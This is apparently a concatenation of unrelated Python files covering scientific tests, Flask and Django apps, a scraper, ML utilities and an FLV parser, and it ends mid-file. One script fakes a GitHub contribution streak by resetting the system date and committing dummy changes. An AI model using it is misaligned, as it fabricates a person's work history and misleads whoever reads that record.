def test_distance_matrix_smooth_expr(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, do_smooth=True, precision=3,
custom_summary='np.max(values)')
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.474', '0.000 0.474']
def test_distance_matrix_smooth_name(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, do_smooth=True, precision=3,
custom_summary='numpy.max')
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.474', '0.000 0.474']
def test_distance_matrix_pairwise_expr(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, precision=3,
custom_pairwise='abs(left - right) / (left + right + 1000)')
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.001', '0.000 0.001']
def test_distance_matrix_pairwise_name(self):
counts_left = utils.counts(utils.SEQUENCES_LEFT, 8)
counts_right = utils.counts(utils.SEQUENCES_RIGHT, 8)
out = StringIO()
with utils.open_profile(self.multi_profile(8,
[counts_left,
counts_right,
counts_left],
['a', 'b', 'c'])) as handle:
kmer.distance_matrix(handle, out, precision=3,
custom_pairwise='numpy.multiply')
assert out.getvalue().strip().split('\n') == ['3', 'a', 'b', 'c', '0.084', '1.206 0.084']
| python |
__author__ = 'wei'
__all__=["gt_req_pb2" ] | python |
import os
import toml
from test_common import make_source_dic
from rcwa.tmm import tmm_
def make_layer_dic(epsilon, mu, thickness):
return {'epsilon': epsilon, 'mu': mu, 'thickness': thickness}
def test_benchmark():
'''Test case from Computational Electromagnetics Course Assignment by Raymond Rumpf'''
try:
os.remove('output.toml')
except FileNotFoundError:
pass
source_dic = make_source_dic(1, 57, 23, [1, 0], [0, 1])
superstrate_dic = {'mu': 1.2, 'epsilon': 1.4}
layer_1_dic = make_layer_dic(2, 1, 0.25)
layer_2_dic = make_layer_dic(1, 3, 0.5)
substrate_dic = {'mu': 1.6, 'epsilon': 1.8}
input_toml = {'layer': [layer_1_dic, layer_2_dic], 'source': source_dic,\
'superstrate': superstrate_dic, 'substrate': substrate_dic}
tmm_(input_toml)
output_toml = toml.load('output.toml')
assert output_toml['R']['00'] == 0.4403
assert output_toml['T']['00'] == 0.5597
assert output_toml['R_T']['00'] == 1
| python |
from bs4 import BeautifulSoup
with open('cooking.html') as f:
body = f.read()
soup = BeautifulSoup(body, 'lxml')
def rows(soup):
item = soup.find(id='Recipes').find_next('table').tr
while item:
if item:
item = item.next_sibling
if item:
item = item.next_sibling
if item:
yield item
def counts(text):
start = 0
end = text.find(')', start)
while end != -1:
mid = text.find('(', start, end)
name = text[start:mid].strip().replace(u'\xa0', ' ')
count = int(text[mid+1:end])
yield name, count
start = end + 1
end = text.find(')', start)
def edges(item):
td = item.find_all('td')
name = td[1].text.strip()
for ingredient, count in counts(td[3].text):
yield name, ingredient, count
mappings = (
(u'\xa0', ' '),
(u' ', ';'),
(u'(', None),
(u')', None),
)
for item in rows(soup):
for a, b, c in edges(item):
print('{}\t{}\t{}'.format(a, b, c))
| python |
from collections import OrderedDict
from flask import Flask
from werkzeug.wsgi import DispatcherMiddleware, SharedDataMiddleware
import config
from ext import sse
from views import home, json_api
def create_app():
app = Flask(__name__)
app.config.from_object(config)
app.register_blueprint(home.bp)
app.register_blueprint(sse, url_prefix='/stream')
app.wsgi_app = DispatcherMiddleware(app.wsgi_app, OrderedDict((
('/j', json_api),
)))
app.add_url_rule('/uploads/<filename>', 'uploaded_file',
build_only=True)
app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {
'/uploads': app.config['UPLOAD_FOLDER']
})
return app
app = create_app()
# For local test
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE')
return response
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8100, debug=app.debug)
| python |
# -*- coding: utf-8 -*-
import sys
import glob
import codecs
args = sys.argv
#FilePath
product_path_name = args[1]
grep_file_name = product_path_name + "\**\*.txt"
result_file_name = "ResultGrep.txt"
hit_word = "TODO"
# include subdirectories in the search
list_up = glob.glob(grep_file_name, recursive=True)
result_open = codecs.open(result_file_name, "w", "utf-8")
return_code = 0
for path_name in list_up:
with open(path_name, encoding="utf8", errors='ignore') as f:
        # read the file
        code = f.readlines()
        # strip trailing newlines
        code_cut_new_line = [line.strip() for line in code]
        # extract lines that contain the search word
list_hit_line = [line for line in code_cut_new_line if hit_word in line]
        # if there are any hits, output the file name
        if len(list_hit_line) != 0:
            result_open.write(path_name + "\r\n")
            return_code = 1
            # output the matching lines
for line in list_hit_line:
result_open.writelines(line)
result_open.writelines("\r\n")
result_open.close()
sys.exit(return_code)
| python |
from osgeo import gdal
import os
import numpy as np
from scipy import ndimage as ndi
from skimage.morphology import remove_small_objects, watershed
import tqdm
def rlencode(x, dropna=False):
"""
Run length encoding.
Based on http://stackoverflow.com/a/32681075, which is based on the rle
function from R.
Parameters
----------
x : 1D array_like
Input array to encode
dropna: bool, optional
Drop all runs of NaNs.
Returns
-------
start positions, run lengths, run values
"""
where = np.flatnonzero
x = np.asarray(x)
n = len(x)
if n == 0:
return (np.array([], dtype=int),
np.array([], dtype=int),
np.array([], dtype=x.dtype))
starts = np.r_[0, where(~np.isclose(x[1:], x[:-1], equal_nan=True)) + 1]
lengths = np.diff(np.r_[starts, n])
values = x[starts]
if dropna:
mask = ~np.isnan(values)
starts, lengths, values = starts[mask], lengths[mask], values[mask]
return starts, lengths, values
def rldecode(starts, lengths, values, minlength=None):
"""
Decode a run-length encoding of a 1D array.
Parameters
----------
starts, lengths, values : 1D array_like
The run-length encoding.
minlength : int, optional
Minimum length of the output array.
Returns
-------
1D array. Missing data will be filled with NaNs.
"""
starts, lengths, values = map(np.asarray, (starts, lengths, values))
ends = starts + lengths
n = ends[-1]
if minlength is not None:
n = max(minlength, n)
x = np.full(n, np.nan)
for lo, hi, val in zip(starts, ends, values):
x[lo:hi] = val
return x
def rle_to_string(rle):
(starts, lengths, values) = rle
items = []
for i in range(len(starts)):
items.append(str(values[i]))
items.append(str(lengths[i]))
return ",".join(items)
def my_watershed(mask1, mask2):
markers = ndi.label(mask2, output=np.uint32)[0]
labels = watershed(mask1, markers, mask=mask1, watershed_line=True)
return labels
def make_submission(prediction_dir, data_dir, submission_file):
# 8881 - 0.3 / +0.4 / 100 / 120 test 8935
threshold = 0.3
f_submit = open(submission_file, "w")
strings = []
predictions = list(sorted(os.listdir(prediction_dir)))
for f in tqdm.tqdm(predictions):
if 'xml' in f:
continue
dsm_ds = gdal.Open(os.path.join(data_dir, f.replace('RGB', 'DSM')), gdal.GA_ReadOnly)
band_dsm = dsm_ds.GetRasterBand(1)
nodata = band_dsm.GetNoDataValue()
dsm = band_dsm.ReadAsArray()
tile_id = f.split('_RGB.tif')[0]
mask_ds = gdal.Open(os.path.join(prediction_dir, f))
mask_img = mask_ds.ReadAsArray()
mask_img[dsm==nodata] = 0
img_copy = np.copy(mask_img)
img_copy[mask_img <= threshold + 0.4] = 0
img_copy[mask_img > threshold + 0.4] = 1
img_copy = img_copy.astype(np.bool)
img_copy = remove_small_objects(img_copy, 100).astype(np.uint8)
mask_img[mask_img <= threshold] = 0
mask_img[mask_img > threshold] = 1
mask_img = mask_img.astype(np.bool)
mask_img = remove_small_objects(mask_img, 120).astype(np.uint8)
labeled_array = my_watershed(mask_img, img_copy)
# labeled_array = remove_on_boundary(labeled_array)
rle_str = rle_to_string(rlencode(labeled_array.flatten()))
s = "{tile_id}\n2048,2048\n{rle}\n".format(tile_id=tile_id, rle=rle_str)
strings.append(s)
f_submit.writelines(strings)
f_submit.close()
| python |
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 15 17:39:25 2018
Good morning! Here's your coding interview problem for today.
This problem was asked by Amazon.
Given a N by M matrix of numbers, print out the matrix in a clockwise spiral.
For example, given the following matrix:
[[1, 2, 3, 4, 5],
[6, 7, 8, 9, 10],
[11, 12, 13, 14, 15],
[16, 17, 18, 19, 20]]
You should print out the following:
1
2
3
4
5
10
15
20
19
18
17
16
11
6
7
8
9
14
13
12
"""
import numpy as np
x = np.random.random_integers(0, 20, (3,4))
def unroll(x) :
print(x)
A = []
while x.shape[0] * x.shape[1] > 0 :
#0deg
try:
A.extend(x[0,:])
x = x[1:,:]
except :
break
#90deg
try:
A.extend(x[:,-1])
x = x[:,:-1]
except :
break
#180deg
try:
A.extend(list(reversed(x[-1,:])))
x = x[:-1,:]
except :
break
#270deg
try:
A.extend(list(reversed(x[:,0])))
x = x[:,1:]
except :
break
return A
unroll(x)
'''
unroll(x)
[[ 7 1 20 18]
[ 0 8 3 13]
[14 11 13 10]]
Out[116]: [7, 1, 20, 18, 13, 10, 13, 11, 14, 0, 8, 3]
''' | python |
from flask import request, render_template, redirect, flash, Blueprint, session, current_app
from ..config import CLIENT_ID, CALLBACK_URL
from bs4 import BeautifulSoup
import requests
import hashlib
import base64
import string
import random
auth = Blueprint('auth', __name__)
@auth.route("/callback")
def indieauth_callback():
code = request.args.get("code")
state = request.args.get("state")
if state != session.get("state"):
flash("Your authentication failed. Please try again.")
return redirect("/")
data = {
"code": code,
"redirect_uri": CALLBACK_URL,
"client_id": CLIENT_ID,
"grant_type": "authorization_code",
"code_verifier": session["code_verifier"]
}
headers = {
"Accept": "application/json"
}
r = requests.post(session.get("token_endpoint"), data=data, headers=headers)
if r.status_code != 200:
flash("There was an error with your token endpoint server.")
return redirect("/login")
# remove code verifier from session because the authentication flow has finished
session.pop("code_verifier")
if r.json().get("me").strip("/") != current_app.config["ME"].strip("/"):
flash("Your domain is not allowed to access this website.")
return redirect("/login")
session["me"] = r.json().get("me")
session["access_token"] = r.json().get("access_token")
return redirect("/")
@auth.route("/logout")
def logout():
session.pop("me")
session.pop("access_token")
return redirect("/home")
@auth.route("/discover", methods=["POST"])
def discover_auth_endpoint():
domain = request.form.get("indie_auth_url")
r = requests.get(domain)
soup = BeautifulSoup(r.text, "html.parser")
authorization_endpoint = soup.find("link", rel="authorization_endpoint")
if authorization_endpoint is None:
flash("An IndieAuth authorization ndpoint could not be found on your website.")
return redirect("/login")
if not authorization_endpoint.get("href").startswith("https://") and not authorization_endpoint.get("href").startswith("http://"):
flash("Your IndieAuth authorization endpoint published on your site must be a full HTTP URL.")
return redirect("/login")
token_endpoint = soup.find("link", rel="token_endpoint")
if token_endpoint is None:
flash("An IndieAuth token endpoint could not be found on your website.")
return redirect("/login")
if not token_endpoint.get("href").startswith("https://") and not token_endpoint.get("href").startswith("http://"):
flash("Your IndieAuth token endpoint published on your site must be a full HTTP URL.")
return redirect("/login")
auth_endpoint = authorization_endpoint["href"]
random_code = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(30))
session["code_verifier"] = random_code
session["authorization_endpoint"] = auth_endpoint
session["token_endpoint"] = token_endpoint["href"]
sha256_code = hashlib.sha256(random_code.encode('utf-8')).hexdigest()
code_challenge = base64.b64encode(sha256_code.encode('utf-8')).decode('utf-8')
state = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
session["state"] = state
return redirect(
auth_endpoint +
"?client_id=" + CLIENT_ID +
"&redirect_uri=" + CALLBACK_URL +
"&scope=profile&response_type=code&code_challenge=" + code_challenge +
"&code_challenge_method=S256&state=" + state
)
@auth.route("/login", methods=["GET", "POST"])
def login():
return render_template("user/auth.html", title="James' Wiki Dashboard Login") | python |
import datetime
import os
# from heavy import special_commit
def modify():
file = open('zero.md', 'r')
flag = int(file.readline()) == 0
file.close()
file = open('zero.md', 'w+')
if flag:
file.write('1')
else:
file.write('0')
file.close()
def commit():
os.system('git commit -a -m test_github_streak > /dev/null 2>&1')
def set_sys_time(year, month, day):
os.system('date -s %04d%02d%02d' % (year, month, day))
def trick_commit(year, month, day):
set_sys_time(year, month, day)
modify()
commit()
def daily_commit(start_date, end_date):
for i in range((end_date - start_date).days + 1):
cur_date = start_date + datetime.timedelta(days=i)
trick_commit(cur_date.year, cur_date.month, cur_date.day)
if __name__ == '__main__':
daily_commit(datetime.date(2020, 9, 20), datetime.date(2020, 11, 9)) | python |
"""
Additional Activation functions not yet present in tensorflow
Creation Date: April 2020
Creator: GranScudetto
"""
import tensorflow as tf
def mish_activation(x):
"""
Mish activation function
as described in:
"Mish: A Self Regularized Non-Monotonic Neural Activation Function"
https://arxiv.org/abs/1908.08681
formula: mish(x) = x * tanh(ln(1 + exp(x)))
= x * tanh(softplus(x))
"""
return (x * tf.math.tanh(tf.math.softplus(x)))
def swish_activation(x):
"""
Swish activation function (currently only in tf-nightly)
as described in:
"Searching for Activation Functions"
https://arxiv.org/abs/1710.05941
formula: swish(x) = x* sigmoid(x)
"""
return(x * tf.math.sigmoid(x))
tf.keras.utils.get_custom_objects().update(
    {'mish_activation': tf.keras.layers.Activation(mish_activation),
     'swish_activation': tf.keras.layers.Activation(swish_activation)}
)
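# Minimal usage sketch (an assumption for illustration, not part of the
# original module): the activations defined above can be passed directly as
# callables to Keras layers.
def _example_model(input_dim=16):
    inputs = tf.keras.Input(shape=(input_dim,))
    x = tf.keras.layers.Dense(32, activation=mish_activation)(inputs)
    x = tf.keras.layers.Dense(32, activation=swish_activation)(x)
    outputs = tf.keras.layers.Dense(1, activation='sigmoid')(x)
    return tf.keras.Model(inputs, outputs)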
| python |
# coding: utf-8
from __future__ import absolute_import
import unittest
from unittest import mock
from swagger_server.test import BaseTestCase
from swagger_server.wml_util import get_wml_credentials
from swagger_server.test_mocked.util import mock_wml_env, MOCKED_CREDENTIALS_VARS
class TestWMLUtil(BaseTestCase, unittest.TestCase):
"""WML util integration test stubs"""
@mock_wml_env()
@mock.patch("swagger_server.wml_util.requests.request")
def test_get_wml_credentials(self, mock_request):
"""Test case for get_wml_credentials
Get WML credentials
"""
mock_request.return_value.json.return_value = {
"access_token": "token",
"refresh_token": "refresh_token",
"token_type": "Bearer",
"expires_in": 3600,
"expiration": 1598543068,
"scope": "ibm openid"
}
expected = ("{'token': 'token', 'space_id': '" + MOCKED_CREDENTIALS_VARS['WML_SPACE_ID'] + "', 'url': '" + MOCKED_CREDENTIALS_VARS['WML_URL'] + "'}")
response = get_wml_credentials()
assert isinstance(response, object)
assert str(response) == expected, 'response is not matching expected response'
mock_request.assert_called_once_with("POST", 'https://iam.cloud.ibm.com/identity/token', data='grant_type=urn%3Aibm%3Aparams%3Aoauth%3Agrant-type%3Aapikey&apikey=apikey', headers=mock.ANY) | python |
"""
Code to represent a dataset release.
"""
from enum import Enum
import json
import copy
from dataclasses import dataclass
from typing import Dict, List, Tuple
####################
# Utility functions and enums.
def load_jsonl(fname):
return [json.loads(line) for line in open(fname)]
class Label(Enum):
SUPPORTS = 1
NEI = 0
REFUTES = -1
def make_label(label_str, allow_NEI=True):
lookup = {"SUPPORT": Label.SUPPORTS,
"NOT_ENOUGH_INFO": Label.NEI,
"CONTRADICT": Label.REFUTES}
res = lookup[label_str]
if (not allow_NEI) and (res is Label.NEI):
raise ValueError("An NEI was given.")
return res
####################
# Representations for the corpus and abstracts.
@dataclass(repr=False, frozen=True)
class Document:
id: str
title: str
sentences: Tuple[str]
def __repr__(self):
return self.title.upper() + "\n" + "\n".join(["- " + entry for entry in self.sentences])
def __lt__(self, other):
return self.title.__lt__(other.title)
def dump(self):
res = {"doc_id": self.id,
"title": self.title,
"abstract": self.sentences,
"structured": self.is_structured()}
return json.dumps(res)
@dataclass(repr=False, frozen=True)
class Corpus:
"""
A Corpus is just a collection of `Document` objects, with methods to look up
a single document.
"""
documents: List[Document]
def __repr__(self):
return f"Corpus of {len(self.documents)} documents."
def __getitem__(self, i):
"Get document by index in list."
return self.documents[i]
def get_document(self, doc_id):
"Get document by ID."
res = [x for x in self.documents if x.id == doc_id]
assert len(res) == 1
return res[0]
@classmethod
def from_jsonl(cls, corpus_file):
corpus = load_jsonl(corpus_file)
documents = []
for entry in corpus:
doc = Document(entry["doc_id"], entry["title"], entry["abstract"])
documents.append(doc)
return cls(documents)
####################
# Gold dataset.
class GoldDataset:
"""
Class to represent a gold dataset, include corpus and claims.
"""
def __init__(self, corpus_file, data_file):
self.corpus = Corpus.from_jsonl(corpus_file)
self.claims = self._read_claims(data_file)
def __repr__(self):
msg = f"{self.corpus.__repr__()} {len(self.claims)} claims."
return msg
def __getitem__(self, i):
return self.claims[i]
def _read_claims(self, data_file):
"Read claims from file."
examples = load_jsonl(data_file)
res = []
for this_example in examples:
entry = copy.deepcopy(this_example)
entry["release"] = self
entry["cited_docs"] = [self.corpus.get_document(doc)
for doc in entry["cited_doc_ids"]]
assert len(entry["cited_docs"]) == len(entry["cited_doc_ids"])
del entry["cited_doc_ids"]
res.append(Claim(**entry))
res = sorted(res, key=lambda x: x.id)
return res
def get_claim(self, example_id):
"Get a single claim by ID."
keep = [x for x in self.claims if x.id == example_id]
assert len(keep) == 1
return keep[0]
@dataclass
class EvidenceAbstract:
"A single evidence abstract."
id: int
label: Label
rationales: List[List[int]]
@dataclass(repr=False)
class Claim:
"""
Class representing a single claim, with a pointer back to the dataset.
"""
id: int
claim: str
evidence: Dict[int, EvidenceAbstract]
cited_docs: List[Document]
release: GoldDataset
def __post_init__(self):
self.evidence = self._format_evidence(self.evidence)
@staticmethod
def _format_evidence(evidence_dict):
# This function is needed because the data schema is designed so that
# each rationale can have its own support label. But, in the dataset,
# all rationales for a given claim / abstract pair all have the same
# label. So, we store the label at the "abstract level" rather than the
# "rationale level".
res = {}
for doc_id, rationales in evidence_dict.items():
doc_id = int(doc_id)
labels = [x["label"] for x in rationales]
if len(set(labels)) > 1:
msg = ("In this SciFact release, each claim / abstract pair "
"should only have one label.")
raise Exception(msg)
label = make_label(labels[0])
rationale_sents = [x["sentences"] for x in rationales]
this_abstract = EvidenceAbstract(doc_id, label, rationale_sents)
res[doc_id] = this_abstract
return res
def __repr__(self):
msg = f"Example {self.id}: {self.claim}"
return msg
def pretty_print(self, evidence_doc_id=None, file=None):
"Pretty-print the claim, together with all evidence."
msg = self.__repr__()
print(msg, file=file)
# Print the evidence
print("\nEvidence sets:", file=file)
for doc_id, evidence in self.evidence.items():
# If asked for a specific evidence doc, only show that one.
if evidence_doc_id is not None and doc_id != evidence_doc_id:
continue
print("\n" + 20 * "#" + "\n", file=file)
ev_doc = self.release.corpus.get_document(doc_id)
print(f"{doc_id}: {evidence.label.name}", file=file)
for i, sents in enumerate(evidence.rationales):
print(f"Set {i}:", file=file)
kept = [sent for i, sent in enumerate(ev_doc.sentences) if i in sents]
for entry in kept:
print(f"\t- {entry}", file=file)
####################
# Predicted dataset.
class PredictedDataset:
"""
Class to handle predictions, with a pointer back to the gold data.
"""
def __init__(self, gold, prediction_file):
"""
        Takes a GoldDataset, as well as a file with rationale and label
        predictions.
"""
self.gold = gold
self.predictions = self._read_predictions(prediction_file)
def __getitem__(self, i):
return self.predictions[i]
def __repr__(self):
msg = f"Predictions for {len(self.predictions)} claims."
return msg
def _read_predictions(self, prediction_file):
res = []
predictions = load_jsonl(prediction_file)
for pred in predictions:
prediction = self._parse_prediction(pred)
res.append(prediction)
return res
def _parse_prediction(self, pred_dict):
claim_id = pred_dict["id"]
predicted_evidence = pred_dict["evidence"]
res = {}
# Predictions should never be NEI; there should only be predictions for
# the abstracts that contain evidence.
for key, this_prediction in predicted_evidence.items():
label = this_prediction["label"]
evidence = this_prediction["sentences"]
pred = PredictedAbstract(int(key),
make_label(label, allow_NEI=False),
evidence)
res[int(key)] = pred
gold_claim = self.gold.get_claim(claim_id)
return ClaimPredictions(claim_id, res, gold_claim)
@dataclass
class PredictedAbstract:
# For predictions, we have a single list of rationale sentences instead of a
# list of separate rationales (see paper for details).
abstract_id: int
label: Label
rationale: List
@dataclass
class ClaimPredictions:
claim_id: int
predictions: Dict[int, PredictedAbstract]
gold: Claim = None # For backward compatibility, default this to None.
def __repr__(self):
msg = f"Predictions for {self.claim_id}: {self.gold.claim}"
return msg
def pretty_print(self, evidence_doc_id=None, file=None):
msg = self.__repr__()
print(msg, file=file)
# Print the evidence
print("\nEvidence sets:", file=file)
for doc_id, prediction in self.predictions.items():
# If asked for a specific evidence doc, only show that one.
if evidence_doc_id is not None and doc_id != evidence_doc_id:
continue
print("\n" + 20 * "#" + "\n", file=file)
ev_doc = self.gold.release.corpus.get_document(doc_id)
print(f"{doc_id}: {prediction.label.name}", file=file)
# Print the predicted rationale.
sents = prediction.rationale
kept = [sent for i, sent in enumerate(ev_doc.sentences) if i in sents]
for entry in kept:
print(f"\t- {entry}", file=file)
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import User
from .forms import CustomUserChangeForm,CustomUserCreationForm
class CustomUserAdmin(UserAdmin):
add_form = CustomUserCreationForm
form = CustomUserChangeForm
model = User
fieldsets = (
('User Profile', {'fields': ('name',)}),
) + UserAdmin.fieldsets
list_display = ('username','name','is_superuser')
search_fields = ['name',]
admin.site.register(User, CustomUserAdmin)
import ptypes, math, logging
from ptypes import *
from .primitives import *
ptypes.setbyteorder(ptypes.config.byteorder.bigendian)
### primitives
## float types
class FLOAT16(pfloat.half): pass
class FLOAT(pfloat.single): pass
class DOUBLE(pfloat.double): pass
## int types
class SI8(pint.int8_t): pass
class SI16(pint.int16_t): pass
class SI24(pint.int_t): length = 3
class SI32(pint.int32_t): pass
class SI64(pint.int64_t): pass
class UI8(pint.uint8_t): pass
class UI16(pint.uint16_t): pass
class UI24(pint.uint_t): length = 3
class UI32(pint.uint32_t): pass
class UI64(pint.uint64_t): pass
(SI8, UI8, SI16, UI16, SI32, UI32, UI64) = ( pint.bigendian(x) for x in (SI8,UI8,SI16,UI16,SI32,UI32,UI64) )
## fixed-point types
class SI8_8(pfloat.sfixed_t): length,fractional = 2,8
class SI16_16(pfloat.sfixed_t): length,fractional = 4,16
class UI8_8(pfloat.ufixed_t): length,fractional = 2,8
class UI16_16(pfloat.ufixed_t): length,fractional = 4,16
#### Tags
class TagHeader(ptype.definition): cache = {}
class TagBody(ptype.definition): cache = {}
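# TagHeader and TagBody act as registries keyed by the FLV tag type: the
# concrete audio/video/script classes below attach themselves with
# @TagHeader.define / @TagBody.define (using their ``type`` attribute), and
# StreamTag later looks the matching class up via ``withdefault(tag_type, ...)``.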
### AUDIODATA
@TagHeader.define
class AudioTagHeader(pbinary.struct):
type = 8
_fields_ = [
(4,'SoundFormat'),
(2,'SoundRate'),
(1,'SoundSize'),
(1,'SoundType'),
(lambda s: 8 if s['SoundFormat'] == 10 else 0,'AACPacketType'),
]
# FIXME
@TagBody.define
class AudioTagBody(pstruct.type):
type = 8
    def __Data(self):
        # the audio header lives on the enclosing StreamTag, not directly on FLVTAG
        h = self.getparent(StreamTag)['Header'].li
        return AudioPacketData.lookup(h['SoundFormat'])
_fields_ = [(__Data, 'Data')]
## audio packet data
class AudioPacketData(ptype.definition): cache = {}
@AudioPacketData.define
class AACAUDIODATA(pstruct.type):
type = 10
    _fields_ = [(lambda s: AudioSpecificConfig if s.getparent(StreamTag)['Header'].li['AACPacketType'] == 0 else ptype.block, 'Data')]
### VIDEODATA
@TagHeader.define
class VideoTagHeader(pstruct.type):
type = 9
class Type(pbinary.struct):
_fields_ = [(4, 'FrameType'), (4, 'CodecID')]
def summary(self):
return 'FrameType:{:d} CodecId:{:d}'.format(self['FrameType'], self['CodecID'])
def __Header(self):
t = self['Type'].li
return VideoPacketHeader.withdefault(t['CodecID'], type=t['CodecID'])
_fields_ = [
(Type, 'Type'),
(__Header, 'Header'),
]
def summary(self):
h = self['Type']
        return 'Type{{{:s}}} {:s} {:s}'.format(h.summary(), self['Header'].classname(), self['Header'].summary() or repr(''))
# FIXME
@TagBody.define
class VideoTagBody(pstruct.type):
type = 9
def __Data(self):
h = self.getparent(StreamTag)['Header'].li
t = h['Type']
if t['FrameType'] == 5:
return UI8
        return VideoPacketData.lookup(t['CodecID'])
_fields_ = [(__Data,'Data')]
## video packet header
class VideoPacketHeader(ptype.definition):
cache = {}
class unknown(pstruct.type): _fields_ = []
default = unknown
@VideoPacketHeader.define
class AVCVIDEOPACKETHEADER(pstruct.type):
type = 7
class AVCPacketType(pint.enum, UI8):
_values_ = [
(0, 'AVC sequence header'),
(1, 'AVC NALU'),
(2, 'AVC end-of-sequence header'),
]
_fields_ = [
(AVCPacketType, 'AVCPacketType'),
(SI24, 'CompositionTime'),
]
## video packet data
class VideoPacketData(ptype.definition): cache = {}
@VideoPacketData.define
class H263VIDEOPACKET(pbinary.struct):
"""Sorenson H.263"""
type = 2
def __Custom(self):
t = self['PictureSize']
if t == 0:
return 8
elif t == 1:
return 16
return 0
class ExtraInformation(pbinary.terminatedarray):
class _object_(pbinary.struct):
_fields_ = [
(1, 'Flag'),
(lambda s: s['Flag'] and 8 or 0, 'Data'),
]
def isTerminator(self, value):
return self['Flag'] == 0
class MACROBLOCK(pbinary.struct):
class BLOCKDATA(ptype.block):
# FIXME: Look up H.263 ieee spec
pass
_fields_ = [
(1, 'CodecMacroBlockFlag'),
# ...
(ptype.block, 'MacroBlockType'), # H.263 5.3.2
(ptype.block, 'BlockPattern'), # H.263 5.3.5
(2, 'QuantizerInformation'), # H.263 5.3.6
(2, 'MotionVectorData'), # H.263 5.3.7
(6, 'ExtraMotionVectorData'), # H.263 5.3.8
(dyn.array(BLOCKDATA, 6), 'BlockData'),
]
_fields_ = [
(17, 'PictureStartCode'),
(5, 'Version'),
(8, 'TemporalReference'),
(3, 'PictureSize'),
(__Custom, 'CustomWidth'),
(__Custom, 'CustomHeight'),
(2, 'PictureType'),
(1, 'DeblockingFlag'),
(5, 'Quantizer'),
(ExtraInformation, 'ExtraInformation'),
(MACROBLOCK, 'Macroblock'),
]
@VideoPacketData.define
class SCREENVIDEOPACKET(pstruct.type):
"""Screen video"""
type = 3
class IMAGEBLOCK(pstruct.type):
_fields_ = [
(pint.bigendian(UI16), 'DataSize'), # UB[16], but whatever
(lambda s: dyn.block(s['DataSize'].li.int()), 'Data'),
]
def __ImageBlocks(self):
w,h = self['Width'],self['Height']
blocks_w = math.ceil(w['Image'] / float(w['Block']))
blocks_h = math.ceil(h['Image'] / float(h['Block']))
count = blocks_w * blocks_h
return dyn.array(self.IMAGEBLOCK, math.trunc(count))
class Dim(pbinary.struct):
_fields_ = [(4,'Block'),(12,'Image')]
_fields_ = [
(Dim, 'Width'),
(Dim, 'Height'),
(__ImageBlocks, 'ImageBlocks'),
]
@VideoPacketData.define
class VP6FLVVIDEOPACKET(pstruct.type):
"""On2 VP6"""
type = 4
class Adjustment(pbinary.struct):
_fields_ = [(4, 'Horizontal'),(4,'Vertical')]
_fields_ = [
(Adjustment, 'Adjustment'),
(lambda s: dyn.block(s.getparent(StreamTag).DataSize() - s['Adjustment'].li.size()), 'Data'),
]
@VideoPacketData.define
class VP6FLVALPHAVIDEOPACKET(pstruct.type):
"""On2 VP6 with alpha channel"""
type = 5
def __AlphaData(self):
return ptype.undefined
def __Data(self):
streamtag = self.getparent(StreamTag)
sz = streamtag.DataSize()
ofs = self['OffsetToAlpha'].li.int()
if ofs + self['Adjustment'].li.size() >= sz:
logging.warning('OffsetToAlpha incorrect : %x', self.getoffset())
return dyn.block(sz - self['Adjustment'].size() - self['OffsetToAlpha'].size())
return dyn.block(ofs)
_fields_ = [
(VP6FLVVIDEOPACKET.Adjustment, 'Adjustment'),
(UI24, 'OffsetToAlpha'),
# (lambda s: dyn.block(s['OffsetToAlpha'].li.int()), 'Data'),
(__Data, 'Data'),
(lambda s: dyn.block(s.getparent(StreamTag).DataSize() - (s['Adjustment'].li.size()+s['OffsetToAlpha'].li.size()+s['Data'].li.size())), 'AlphaData'),
]
@VideoPacketData.define
class SCREENV2VIDEOPACKET(pstruct.type):
"""Screen video version 2"""
type = 6
class Flags(pbinary.struct):
_fields_ = [
(6, 'Reserved'),
(1, 'HasIFrameImage'),
(1, 'HasPaletteInfo'),
]
class IMAGEBLOCKV2(pstruct.type):
class IMAGEFORMAT(pbinary.struct):
_fields_ = [
(3, 'Reserved'),
(2, 'ColorDepth'),
(1, 'HasDiffBlocks'),
(1, 'ZlibPrimeCompressCurrent'),
(1, 'ZlibPrimeCompressPrevious'),
]
class IMAGEDIFFPOSITION(pstruct.type):
_fields_ = [(UI8,n) for n in ('RowStart','Height')]
class IMAGEPRIMEPOSITION(pbinary.struct):
_fields_ = [(UI8,n) for n in ('Block column','Block row')]
def __ImageBlockHeader(self):
# FIXME: since this field depends on 2 separate flags...which one should get prio?
fmt = self['Format'].li
if fmt['HasDiffBlocks']:
return self.IMAGEDIFFPOSITION
elif fmt['ZlibPrimeCompressCurrent']:
return self.IMAGEPRIMEPOSITION
return ptype.undefined
_fields_ = [
(pint.bigendian(UI16), 'DataSize'), # UB[16], but whatever
(IMAGEFORMAT, 'Format'),
(__ImageBlockHeader, 'ImageBlockHeader'),
(lambda s: dyn.block(s['DataSize'].li.int()), 'Data'),
]
def __ImageBlocks(self):
w,h = self['Width'],self['Height']
blocks_w = math.ceil(w['Image'] / float(w['Block']))
blocks_h = math.ceil(h['Image'] / float(h['Block']))
